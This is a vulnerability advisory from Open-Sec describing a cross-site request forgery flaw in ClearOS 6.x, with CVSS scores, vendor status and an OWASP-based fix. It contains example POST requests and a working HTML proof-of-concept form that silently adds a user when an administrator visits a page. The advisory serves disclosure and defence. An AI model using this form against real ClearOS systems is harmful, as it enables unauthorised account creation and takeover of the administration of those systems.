Advisory
ID: OS002
Product:
ClearOS
Created
by: Clear Foundation
(http://www.clearfoundation.com/Foundation/core-team-honor-roll.html)
Vulnerable
Version(s): 6.X.X
Tested
Version: 6.1.0 - 6.3.0
Vulnerability
Type: Cross-Site Request Forgery (CSRF) [CWE-352]
Public
Disclosure : No yet
Vendor
status : Notified
Vendor
Answer : "We expect these to be resolved for the ClearOS 6.4.0
Beta 2 (due later this month)."
CVSS
Base Score: 5.8
CVSS
Temporal Score: 4.8
CVSS
Environmental Score: 4.8
Researcher:
Camilo Galdos, Security Consultant @ Open-sec (
http://www.open-sec.com/ )
Advisory
Details :
Camilo
Galdos, Security Consultant at Open-Sec discovered a vulnerability in
ClearOS, which can be exploited to remotely add accounts to the
ClearOS system by making the Administrator access a link.
Vulnerability
Description: Cross-Site Request Forgery (CSRF) in ClearOS:
90%
of the forms in ClearOS and Modules do not use a Token to correctly
verify if the form is being send by the administrator or user in
ClearOS.
Examples
of URLs that lead to exploit this vulnerability are:
https://127.0.0.1:81/app/users/edit/get
POST:
user_info%5Bcore%5D%5Busername%5D=get&user_info%5Bcore%5D%5Bfirst_name%5D=Get&user_info%5Bcore%5D%5Blast_name%5D=ClearOS&password=clear&verify=clear&user_info%5Bplugins%5D%5Bftp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bopenvpn%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bpptpd%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bprint_server%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bsmtp%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Buser_certificates%5D%5Bstate%5D=0&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=0&user_info%5Bextensions%5D%5Bshell%5D%5Blogin_shell%5D=%2Fsbin%2Fnologin&submit=Update
https://127.0.0.1:81/app/users/add
POST:
user_info%5Bcore%5D%5Busername%5D=usernametest&user_info%5Bcore%5D%5Bfirst_name%5D=firstnametest&user_info%5Bcore%5D%5Blast_name%5D=lastnametest&password=l0l123&verify=l0l123&user_info%5Bplugins%5D%5Bweb_proxy%5D%5Bstate%5D=1&submit=Add
Exploit:
<html>
<title>CSRF
ClearOS</title>
<h1>CSRF
ClearOS ~ Open-Sec</h1>
<form
name="lol" id="lol" class="theme-form"
action="https://192.168.1.40:81/app/users/add"
method="post" accept-charset="utf-8"
autocomplete="off">
<input
type="hidden" name="user_info[core][username]"
value="Dedalo"/>
<input
type="hidden" name="user_info[core][first_name]"
value="Camilo"/>
<input
type="hidden" name="user_info[core][last_name]"
value="Galdos"/>
<input
type="hidden" name="password" value="p455w0rd"/>
<input
type="hidden" name="verify" value="p455w0rd"/>
<input
type="submit" name="submit" value="Add"/>
</form>
</html>
Impact:
Administrators can be scammed to visit a link and when they visit it
they automaticaly create a new user or edit a user or change a
password or anything that is in a form because almost no form has a
token to validate.
Solution:
To
fix this kind of vulnerability (CSRF) you must put an authentication
token in every form to validate that the form is being sent from an
specified module or page. Owasp have different examples in different
Programming Languages so you can take one in example to patch this
vulnerability.
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet
Contact
Information: For additional details, feel free to contact Camilo
Galdos at cgaldos[at]open-sec.com
About Open-Sec:
Open-Sec
is a Perú based company focused on penetration testing and security
incidents investigation services. With customers at Perú, Ecuador,
Panamá and Honduras, Open-Sec provides consulting services through a
team of certified and experienced consultants.
Disclaimer:
The information provided in this Advisory is provided "as is"
and without any warranty of any kind. Details of this Advisory may be
updated in order to provide as accurate information as possible.